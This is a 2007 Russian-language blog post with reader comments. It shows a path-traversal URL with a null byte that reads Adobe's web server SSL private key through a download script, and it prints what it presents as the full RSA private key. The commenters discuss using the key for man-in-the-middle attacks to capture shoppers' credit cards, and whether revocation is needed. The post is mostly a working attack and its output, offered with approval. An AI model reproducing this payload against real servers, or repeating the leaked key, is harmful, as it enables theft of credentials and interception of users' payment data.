Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет mumuntu ([info]mumuntu)
@ 2007-09-26 19:42:00
Previous Entry  Add to memories!  Tell a Friend!  Next Entry
Настроение:Хакер Хэлл
Музыка:придет и за вами

Показали сейчас отличное.
Заходим сюда: http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/ssl.key/www.adobe.com.key%00.
И видим вот что:

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC+gu/eSRi5ThbYrVQcewZFQc/Kfa8B/gKOKzD98aY9hvNFj3pd
w5kw+dSlOCU78jrGkbP4m0GyNN27zDAQlWPEkmyzrOqBYvLnWFQ2kTzPlMBNt2yd
F5TsXqCJvqbwvTn+ExBxvBQyoYpdjl37sk9cyqqAVtavbx1UL5956EWW5wIDAQAB AoGATkxUN2CFd8tfWmhKVHY/ioFU3F0xazkxZarctNH3R/xJyYIBgb3dHSLgwZLE
wtF4VJoXhIqSwqI1q3RtILO1T6OioXVRPsHOZZCB0SV+67Qk0/ukm9rftQUJ95Jx v4oM4pugVZieScQ3eZaShT0JumjMd3+dQybkJx6iHQ9wO1ECQQDywfyHvZ6Oa45X
cjOHIGHBDd3kXyJdVjxljtELO0tv2qPYw6UCAdQxjA5Zit+2tCrOVNZx1Y0woUdH
A7DG0KGpAkEAyOdaM9pXB7Bw5fjuIH5BaZXT1ZgdY90nlnYq00kbZVaj5CS8mTAQ
/brK0dOAM3a0KXP4YXw++WxIV2h+WFnuDwJBAKMgVdjFQ/HCNtFuTU/lI6s97TiT
8Ry1YTqBgNnCS4vraSS1O4Ggxv1QdygWmQRGB2nFOqEd9pWSGrqOsVC4S5kCQQDF
xuOI6mgE3NC3xNB/0msIy4On4UEFn6CqQZg1OeIraBidrwCveZ8weaPS3nh1sWT4
7f7V0V+ZYdzxl5/R0G5HAkAzMm0Rs6TOIuUvKAPH0YWkbzyTNzIsMUlf2plbFko3 KE1w2vwntoaGaZu366ZE9B+GlunvZsR8o0gBtnNc8rur
-----END RSA PRIVATE KEY-----

То есть, ни что иное, как закрытый ключ компании Adobe.
Ничего ребята работают, молодцы.


(Читать комментарии) - (Добавить комментарий)

гы
[info]altyn@lj
2007-09-26 13:06 (ссылка)
мало того шо апач не пропатчили, так еще мозгов не хватило смарткартой пользоваться.

(Ответить) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 13:09 (ссылка)
причем здесь апач?
причем здесь смарткарта?

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]altyn@lj
2007-09-26 13:12 (ссылка)
ну с апачем может я поигарячился,
а вот смарткарта - при том, что ключик в ней хранится,и ни при каких условиях он считан быть не может, подпись через спец. апи идет. ну и ясен пень подписывать нужно асинхронно, а не в процессе обработке реквеста.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 14:02 (ссылка)
вы знаете много сайтов, где для обеспечения HTTPs используются смарткарты? я - ни одного
к тому же я не уверен, что апач это умеет
ничего криминального в хранении ключа на сервере я не вижу, разве что возможно стоило его зашифровать
по сути, ну получили вы этот ключ - что он вам дает?

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]blacklion@lj
2007-09-26 14:16 (ссылка)
Он мне даёт устраивать man-in-a-middle атаки. И если е-шоп адобы закрыт тем же сертификатом, что и www.adobe.com, то получать кредитки покупателей.
По сути — им в срочном порядке надо перевыпускать сертификаты и старые вносить в CLR CA.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 16:01 (ссылка)
при условии доступа к трафику, что маловероятно в данном случае. есть ключ, только расшифровывать им нечего :)
сделают revoke, ничего страшного

(Ответить) (Уровень выше)

Re: гы
[info]altyn@lj
2007-09-27 07:44 (ссылка)
а зачем для HTTPs сессии приватный ключ? нужен он только в момент подписи серверного сертификата, подписывается такой сертификат обычно не собственным ключом, а каким-нить верисайном, который присутствует в трастед рут большинства клиентов.
другое дело - подпись или дешифрация каких-либо документов.

(Ответить) (Уровень выше)

(Читать комментарии) -